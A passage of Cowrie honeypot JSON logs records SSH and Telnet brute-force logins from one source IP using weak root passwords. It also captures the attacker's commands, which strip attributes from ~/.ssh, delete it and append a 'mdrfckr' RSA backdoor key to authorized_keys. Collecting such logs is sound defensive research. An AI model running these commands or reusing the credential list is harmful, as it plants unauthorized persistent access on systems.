ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:18:42.386993Z","src_ip":"212.227.235.229","session":"09bdbe3a362f"}
{"eventid":"cowrie.login.failed","username":"core","password":"123","message":"login attempt [core/123] failed","sensor":"my-vps","timestamp":"2025-09-09T02:18:42.776702Z","src_ip":"212.227.235.229","session":"09bdbe3a362f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:18:42.921768Z","src_ip":"212.227.235.229","session":"230a70b512c7"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:18:43.869792Z","src_ip":"212.227.235.229","session":"09bdbe3a362f"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:18:44.173969Z","src_ip":"212.227.235.229","session":"230a70b512c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53334,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3d4c26daedb","protocol":"ssh","message":"New connection: 212.227.235.229:53334 (1.2.3.4:22) [session: f3d4c26daedb]","sensor":"my-vps","timestamp":"2025-09-09T02:18:44.521866Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:18:44.522830Z","src_ip":"212.227.235.229","session":"f3d4c26daedb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:18:44.824283Z","src_ip":"212.227.235.229","session":"f3d4c26daedb"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:18:46.063914Z","src_ip":"212.227.235.229","session":"f3d4c26daedb"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:18:46.318431Z","src_ip":"212.227.235.229","session":"178fa87f3575"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:18:46.364626Z","src_ip":"212.227.235.229","session":"f3d4c26daedb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53706,"dst_ip":"1.2.3.4","dst_port":22,"session":"68381501eb60","protocol":"ssh","message":"New connection: 212.227.235.229:53706 (1.2.3.4:22) [session: 68381501eb60]","sensor":"my-vps","timestamp":"2025-09-09T02:19:18.813396Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:19:18.821995Z","src_ip":"212.227.235.229","session":"68381501eb60"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:19:19.201149Z","src_ip":"212.227.235.229","session":"68381501eb60"}
{"eventid":"cowrie.login.success","username":"root","password":"1A2b3c4d","message":"login attempt [root/1A2b3c4d] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:19:20.729191Z","src_ip":"212.227.235.229","session":"68381501eb60"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:19:21.519454Z","src_ip":"212.227.235.229","session":"68381501eb60"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:19:21.520351Z","src_ip":"212.227.235.229","session":"68381501eb60"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:19:21.521235Z","src_ip":"212.227.235.229","session":"68381501eb60"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:19:21.902627Z","src_ip":"212.227.235.229","session":"68381501eb60"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:19:22.767576Z","src_ip":"212.227.235.229","session":"68381501eb60"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:19:22.768241Z","src_ip":"212.227.235.229","session":"68381501eb60"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:19:23.156368Z","src_ip":"212.227.235.229","session":"68381501eb60"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:19:23.157228Z","src_ip":"212.227.235.229","session":"68381501eb60"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55534,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa3357568f0f","protocol":"ssh","message":"New connection: 212.227.235.229:55534 (1.2.3.4:22) [session: aa3357568f0f]","sensor":"my-vps","timestamp":"2025-09-09T02:19:23.529052Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:19:23.533617Z","src_ip":"212.227.235.229","session":"aa3357568f0f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:19:23.915433Z","src_ip":"212.227.235.229","session":"aa3357568f0f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:19:25.444685Z","src_ip":"212.227.235.229","session":"aa3357568f0f"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:19:26.827969Z","src_ip":"212.227.235.229","session":"aa3357568f0f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57032,"dst_ip":"1.2.3.4","dst_port":22,"session":"d905422abeb0","protocol":"ssh","message":"New connection: 212.227.235.229:57032 (1.2.3.4:22) [session: d905422abeb0]","sensor":"my-vps","timestamp":"2025-09-09T02:19:27.228720Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:19:27.235275Z","src_ip":"212.227.235.229","session":"d905422abeb0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:19:27.629376Z","src_ip":"212.227.235.229","session":"d905422abeb0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:19:29.205177Z","src_ip":"212.227.235.229","session":"d905422abeb0"}
{"eventid":"cowrie.session.closed","duration":"10.8","message":"Connection lost after 10.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:19:29.599613Z","src_ip":"212.227.235.229","session":"68381501eb60"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:19:29.605866Z","src_ip":"212.227.235.229","session":"d905422abeb0"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59450,"dst_ip":"1.2.3.4","dst_port":22,"session":"da90e3ae2305","protocol":"ssh","message":"New connection: 217.72.205.35:59450 (1.2.3.4:22) [session: da90e3ae2305]","sensor":"my-vps","timestamp":"2025-09-09T02:19:40.424844Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:19:40.426323Z","src_ip":"217.72.205.35","session":"da90e3ae2305"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47934,"dst_ip":"1.2.3.4","dst_port":22,"session":"676a72c9452c","protocol":"ssh","message":"New connection: 212.227.235.229:47934 (1.2.3.4:22) [session: 676a72c9452c]","sensor":"my-vps","timestamp":"2025-09-09T02:19:43.432057Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:19:43.432914Z","src_ip":"212.227.235.229","session":"676a72c9452c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46770,"dst_ip":"1.2.3.4","dst_port":23,"session":"2410e36012f4","protocol":"telnet","message":"New connection: 212.227.235.229:46770 (1.2.3.4:23) [session: 2410e36012f4]","sensor":"my-vps","timestamp":"2025-09-09T02:19:43.654889Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:19:43.686342Z","src_ip":"212.227.235.229","session":"676a72c9452c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40700,"dst_ip":"1.2.3.4","dst_port":22,"session":"f35e1435a808","protocol":"ssh","message":"New connection: 212.227.235.229:40700 (1.2.3.4:22) [session: f35e1435a808]","sensor":"my-vps","timestamp":"2025-09-09T02:19:43.717992Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:19:43.718733Z","src_ip":"212.227.235.229","session":"f35e1435a808"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:19:43.805233Z","src_ip":"212.227.235.229","session":"f35e1435a808"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:19:43.873342Z","src_ip":"212.227.235.229","session":"2410e36012f4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:19:43.930376Z","src_ip":"212.227.235.229","session":"2410e36012f4"}
{"eventid":"cowrie.login.failed","username":"client","password":"111111","message":"login attempt [client/111111] failed","sensor":"my-vps","timestamp":"2025-09-09T02:19:44.191077Z","src_ip":"212.227.235.229","session":"f35e1435a808"}
{"eventid":"cowrie.login.failed","username":"muhammad","password":"1","message":"login attempt [muhammad/1] failed","sensor":"my-vps","timestamp":"2025-09-09T02:19:44.739381Z","src_ip":"212.227.235.229","session":"676a72c9452c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:19:45.279436Z","src_ip":"212.227.235.229","session":"f35e1435a808"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:19:45.996152Z","src_ip":"212.227.235.229","session":"676a72c9452c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47273,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc46079299b1","protocol":"ssh","message":"New connection: 212.227.235.229:47273 (1.2.3.4:22) [session: bc46079299b1]","sensor":"my-vps","timestamp":"2025-09-09T02:19:47.405608Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:19:47.413210Z","src_ip":"212.227.235.229","session":"bc46079299b1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:19:47.662493Z","src_ip":"212.227.235.229","session":"bc46079299b1"}
{"eventid":"cowrie.login.success","username":"root","password":"huawei@123","message":"login attempt [root/huawei@123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:19:48.680667Z","src_ip":"212.227.235.229","session":"bc46079299b1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:19:49.205829Z","src_ip":"212.227.235.229","session":"bc46079299b1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:19:49.206609Z","src_ip":"212.227.235.229","session":"bc46079299b1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:19:49.207753Z","src_ip":"212.227.235.229","session":"bc46079299b1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:19:49.461571Z","src_ip":"212.227.235.229","session":"bc46079299b1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:19:50.077579Z","src_ip":"212.227.235.229","session":"bc46079299b1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa 